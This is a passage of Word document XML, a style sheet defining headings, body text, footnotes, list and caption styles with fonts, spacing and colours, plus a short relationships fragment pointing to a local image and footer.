      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Body Text">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:spacing w:before="120"/>
      <w:spacing w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Body Text Char">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Box List">
    <w:name w:val="Box List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bullet List">
    <w:name w:val="Bullet List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Bullets">
    <w:name w:val="Bullets"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:cs="OpenSymbol" w:hAnsi="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="FreeSans" w:cs="FreeSans" w:hAnsi="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Chapter Heading">
    <w:name w:val="Chapter Heading"/>
    <w:basedOn w:val="Numbered Heading 1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Colorful List - Accent 11">
    <w:name w:val="Colorful List - Accent 11"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Comment Subject Char">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Comment Text Char">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>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paragraph" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="000000"/>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Document Map">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:cs="Lucida Grande" w:hAnsi="Lucida Grande"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Document Map Char">
    <w:name w:val="Document Map Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Lucida Grande" w:cs="Lucida Grande" w:hAnsi="Lucida Grande"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Endnote">
    <w:name w:val="Endnote"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:hanging="288"/>
      <w:ind w:left="288"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Endnote Anchor">
    <w:name w:val="Endnote Anchor"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Endnote Characters">
    <w:name w:val="Endnote Characters"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Endnote Reference">
    <w:name w:val="Endnote Reference"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Endnote Text">
    <w:name w:val="Endnote Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Endnote Text Char">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FileName">
    <w:name w:val="FileName"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Footer Char">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footnote">
    <w:name w:val="Footnote"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:hanging="288"/>
      <w:ind w:left="288"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Footnote Anchor">
    <w:name w:val="Footnote Anchor"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Footnote Characters">
    <w:name w:val="Footnote Characters"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Footnote Reference">
    <w:name w:val="Footnote Reference"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footnote Text">
    <w:name w:val="Footnote Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Footnote Text Char">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Frame Contents">
    <w:name w:val="Frame Contents"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Hand List">
    <w:name w:val="Hand List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="Header"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Header Char">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header and Footer">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="Body Text"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:hAnsi="Liberation Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="280"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="345a8a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 1 Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="345a8a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 2 Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 3 Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 4 Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 5 Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 6">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 6 Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="243f60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 7">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 7 Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 8">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 8 Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 9">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading 9 Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heart List">
    <w:name w:val="Heart List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Implies List">
    <w:name w:val="Implies List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="FreeSans" w:cs="FreeSans" w:hAnsi="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Internet Link">
    <w:name w:val="Internet Link"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:u w:val="single"/>
      <w:color w:val="0000ff"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="Body Text"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="FreeSans" w:cs="FreeSans" w:hAnsi="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List Paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListStyle">
    <w:name w:val="ListStyle"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>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pPrDefault>
    <w:rPrDefault>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
      </w:rPr>
    </w:rPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:styleId="Normal (Web)">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="280"/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:cs="Times" w:hAnsi="Times"/>
    </w:rPr>
  </w:style>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Revision">
    <w:name w:val="Revision"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="00000a"/>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Style-1">
    <w:name w:val="Style-1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style-2">
    <w:name w:val="Style-2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style-3">
    <w:name w:val="Style-3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style-4">
    <w:name w:val="Style-4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style-5">
    <w:name w:val="Style-5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style-6">
    <w:name w:val="Style-6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style-8">
    <w:name w:val="Style-8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:jc w:val="left"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Subtitle Char">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="4f81bd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tab">
    <w:name w:val="Tab"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:hAnsi="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Tab Char">
    <w:name w:val="Tab Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:hAnsi="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TabTop">
    <w:name w:val="TabTop"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:hAnsi="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TabTop Char">
    <w:name w:val="TabTop Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:hAnsi="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Table Contents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Table Grid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Normal Table"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tick List">
    <w:name w:val="Tick List"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:after="300"/>
      <w:spacing w:before="360"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="40"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="17365d"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Title Char">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="40"/>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="17365d"/>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jc w:val="both"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="120"/>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="00000a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="annotation reference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="annotation subject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="annotation text"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="annotation text">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="bullet">
    <w:name w:val="bullet"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:hAnsi="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Courier" w:cs="Courier" w:hAnsi="Courier"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="it\u225 ?lico">
    <w:name w:val="it\u225 ?lico"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="itálico">
    <w:name w:val="itálico"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="negrito">
    <w:name w:val="negrito"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="page number">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Default Paragraph Font"/>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16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/rId2.jpg"/><Relationship Id="fId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer0.xml"/></Relationships>
</file>